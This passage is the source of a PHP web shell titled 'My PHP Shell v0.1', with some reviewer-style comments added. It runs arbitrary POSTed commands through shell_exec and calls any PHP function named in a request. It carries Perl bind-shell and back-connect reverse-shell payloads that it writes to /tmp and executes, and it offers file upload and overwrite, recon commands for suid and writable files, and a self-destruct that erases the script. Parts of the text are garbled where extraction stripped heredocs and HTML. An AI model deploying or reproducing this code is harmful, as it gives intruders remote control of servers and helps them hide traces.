"find / -type f -name "), array("Find all writable dirs/files in /" =>"find / -perm -2 -ls"), array("Find all suid files in /" =>"find / -type f -perm -04000 -ls"), array("Find all sgid files in /" =>"find / -type f -perm -02000 -ls"), array("Show open ports" =>"netstat -an | grep -i listen"), array("Show NIC configuration" =>"ip addr show"), ); /*==================END_CONFIG=============*/ foreach ($aliases as $n => $alias_array){ $aliases_str.="\n"; $my_aliases .="myAliases[$n]='". $alias_array[key($alias_array)] . "';\n\t\t"; } $content=array( "ID" =>execute_simple("id"), "UNAME" =>execute_simple("uname -a"), "DATE" =>execute_simple("date"), "SERVER_SIGNATURE" =>$_SERVER['SERVER_SIGNATURE'], "PORT" =>DEFAULT_PORT, "MY_IP" =>MY_IP, "PWD" =>getcwd(), "RESULT" =>"", "CMD" =>$_POST['cmd'], "ALIASES" =>$aliases_str, "MY_ALIASES" =>$my_aliases, "PHP_SELF" =>$_SERVER['PHP_SELF'], ); /* From here edit if you know what you are doing */ if($_POST['cmd']!=""){ if(preg_match('/^clear/',$_POST['cmd'])){ // Clearing the buffer $_SESSION['buf'] = array(); $_SESSION['buf_size'] = 0; }else if(preg_match('/^cd/',$_POST['cmd'])){ /* If we got some "cd" command the behavior should be like in a real shell enviroment */ if($_POST['cmd']=='cd'){ @chdir(dirname($_SERVER['SCRIPT_FILENAME']));//home dir :) } else{ $the_dir=substr($_POST['cmd'],3); $res=change_dir($the_dir); if($the_dir==$res){ chdir($the_dir); }else{ $result_cmd=$res; } } $content['PWD'] = getcwd(); }else{ $my_string = load_buffer($_SESSION['buf']); $my_cmd=execute_with_trap($_POST['cmd']); save_buffer($_SESSION['buf'], $_SESSION['buf_size'], "$ " . $_POST['cmd'] . "\n"); save_buffer($_SESSION['buf'], $_SESSION['buf_size'], $my_cmd); $content['RESULT'] = $my_string ."$ " . $_POST['cmd'] . "\n" . $my_cmd; } } if($_POST['ajax']=="1"){ // We got here an httpRequest so we don't display all shit if($_POST['fn']!=""){ if($_POST['nr']!=""){ //function parameters? how many? 
$nr=(int)$_POST['nr']; for($i=0;$i<=$nr;$i++){ $params[]=$_POST['parm'.$i]; } $ret=call_user_func_array($_POST['fn'],$params); }else{ $ret=call_user_func($_POST['fn']); } } if($ret) echo $ret; // Display the response }else{ if($_POST['submit'] != ""){ switch ($_POST['submit']){ case "Upload": $GLOBALS['error'] = upload(); display($content); break; case "Edit": display_editor($_POST['edit_file']); break; case "Save": save_file(); display($content); break; default: display($content); break; } }else{ display($content); } } /*=====================FUNCTIONS====================*/ /** * Simple command execution * * @param String $cmd * @return String */ function execute_simple($cmd){ $out=shell_exec($cmd); $out=str_replace("\n","",$out); return $out; } /** * Execute command and return the result * * @param String$cmd * @return unknown */ function execute_with_trap($cmd) { if ($stderr){ $tmpfile = tempnam('/tmp', 'tmp'); $cmd .= " 1> $tmpfile 2>&1; cat $tmpfile; rm $tmpfile"; } return htmlspecialchars(shell_exec($cmd), ENT_COMPAT, 'UTF-8'); } /** * Change directory * * @param String $dir * @return String */ function change_dir($dir){ if(is_dir($dir)){ if(is_readable($dir) && is_executable($dir)) return $dir; else return "You don't have permissions to access ".$dir; }else{ return $dir . " is not a directory!"; } } /** * Back connect perl script * * @param String $ip * @param String $port */ function bind_shell_perl($port){ //from r57 I think.. 
$perl_bs=<<&X"; open STDERR,">&X"; system("/bin/sh -i"); close X; PERL_BIND_SHELL; $tmpfile = tempnam('/tmp', '5454'); $fp=fopen($tmpfile,"w");fwrite($fp,$perl_bs);fclose($fp);//writing perl payload to tempfile $cmd= "perl $tmpfile"; shell_exec($cmd); execute_simple("rm -f $tmpfile"); } /** * Back connect perl script * * @param String $ip * @param String $port */ function back_connect_perl($ip,$port){ $perl_bs=<<&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system(\$system); close(STDIN); close(STDOUT); close(STDERR); PERL_BIND_SHELL; $tmpfile = tempnam('/tmp', '5454'); $fp=fopen($tmpfile,"w");fwrite($fp,$perl_bs);fclose($fp);//writing perl payload to tempfile $cmd= "perl $tmpfile"; shell_exec($cmd); execute_simple("rm -f $tmpfile"); } /** * Upload a file * * @return String errors * */ function upload(){ if(is_dir($_POST['file_path'])){ if( is_writable( $_POST['file_path'] ) ){ if( !file_exists( $_POST['file_path'] . "/" . $_FILES['file']['name'] ) ){ move_uploaded_file( $_FILES['file']['tmp_name'], $_POST['file_path'] . "/" . 
$_FILES['file']['name'] ); }else { return "File allready exists!"; } }else{ return "You do not have write permissions to this dir"; } }else{ if(!file_exists($_POST['file_path'])){ if( is_writable( dirname( $_POST['file_path'] ) ) ){ move_uploaded_file( $_FILES['file']['tmp_name'], $_POST['file_path']); }else{ return "You do not have write permissions to this dir"; } }else{ return "File allready exists!"; } } } /** * Render the per-session command history as text. * * Joins the buffered lines with "\n" and appends a blank line so the next command block is visually separated. Initialises $buffer to an empty array (by reference) when the session has none yet. * * @param Array $buffer history lines, by reference ($_SESSION['buf']) * @return String * */ function load_buffer(&$buffer){ if(!is_array($buffer)) $buffer = array(); $data = join("\n", $buffer); $data .= "\n\n"; return $data; } /** * Append $lines to the history buffer, keeping at most BUFFER_MAX_LINES lines (constant defined outside the visible span). * * $lines is split on "\n" (so a trailing newline contributes an empty element); when the buffer would overflow, the oldest lines are shifted off first. $buffer_len is meant to track count($buffer); both it and $buffer are updated by reference so the caller's $_SESSION entries persist the change. * * @param Array $buffer * @param Int $buffer_len * @param String $lines text to append (the "$ cmd" line, or the command output) * */ function save_buffer(&$buffer, &$buffer_len, $lines){ if(!is_int($buffer_len)) $buffer_len = 0; $lines = explode("\n", $lines); $len = count($lines); if(($buffer_len + $len) > BUFFER_MAX_LINES){ $drop = $buffer_len + $len - BUFFER_MAX_LINES; $buffer_len -=$drop; while($drop--){ array_shift($buffer); } } $buffer_len += $len; while($len--){ array_push($buffer, array_shift($lines)); } } /** * Self-destruct: empty and destroy the PHP session (which holds the command history) and unlink this script from disk. * * Forensics note: after this runs neither the shell file nor its stored session data remain; the web server access log (POST requests carrying ajax=1 / fn=destroy, assuming the front-end calls it that way) is what is left. * */ function destroy(){ /* deletes the script and clears the session */ $_SESSION = array(); session_destroy(); @unlink($_SERVER['SCRIPT_FILENAME']); } /** * Write the editor's content to an attacker-chosen path ($_POST['filepath']), creating the file or overwriting an existing one. * * stripslashes() undoes magic_quotes-era escaping. fopen() is not checked, so a failed open surfaces as fwrite/fclose warnings rather than an error message. Errors are reported through the global $error (note the second message is missing its opening quote). * */ function save_file(){ global $error; $file_path = $_POST['filepath']; $content = $_POST['content']; $content = stripslashes($content); if(!is_dir($file_path)){ if(file_exists($file_path)){ if(is_writable($file_path)){ $fp = fopen($file_path,"w"); fwrite($fp,$content); fclose($fp); }else { $error = "'$file_path' is not writable!"; } }else{ if(is_writable(dirname($file_path))){ $fp = fopen($file_path,"w"); fwrite($fp,$content); fclose($fp); }else{ $error = "$file_path' is not writable!"; } } }else { $error = "'$file_path' is a directory!"; } } /** * Render the file editor for $file, pre-filled with its contents. * * The file is loaded only when it is readable AND writable; otherwise an error string is set. NOTE(review): $error is function-local here (no "global $error", unlike save_file), so it is only visible to the inline template that follows ob_start() -- and this extraction does not preserve that template's PHP. * * @param String $file path posted as edit_file */ function display_editor($file){ if(!is_dir($file)){ 
if(is_readable($file)){ if(is_writable($file)){ $content = file_get_contents($file); }else { $error = "'$file' is not writable!"; } }else { $error = "'$file' is not readable!"; } }else { $error = "'$file' is a directory!"; } /* from here the editor's HTML is captured by output buffering; the markup (and the matching ob_* call) was stripped by extraction */ ob_start(); ?> My PHP Shell <?echo VERSION;?>

Save to file path:

My PHP Shell <?echo VERSION;?>
My PHP Shell v0.1



uname -a {UNAME}
id {ID}
httpd {SERVER_SIGNATURE}
date {DATE}
pwd {PWD}

Executed:   {CMD}



BindShell:  
  | 
Back-Connect:   :
  |  Upload:     |  Edit file:  
$value){ $html_content=str_replace("{".$pattern."}",$value,$html_content); //some template shit... } ob_end_clean(); echo $html_content; } ?>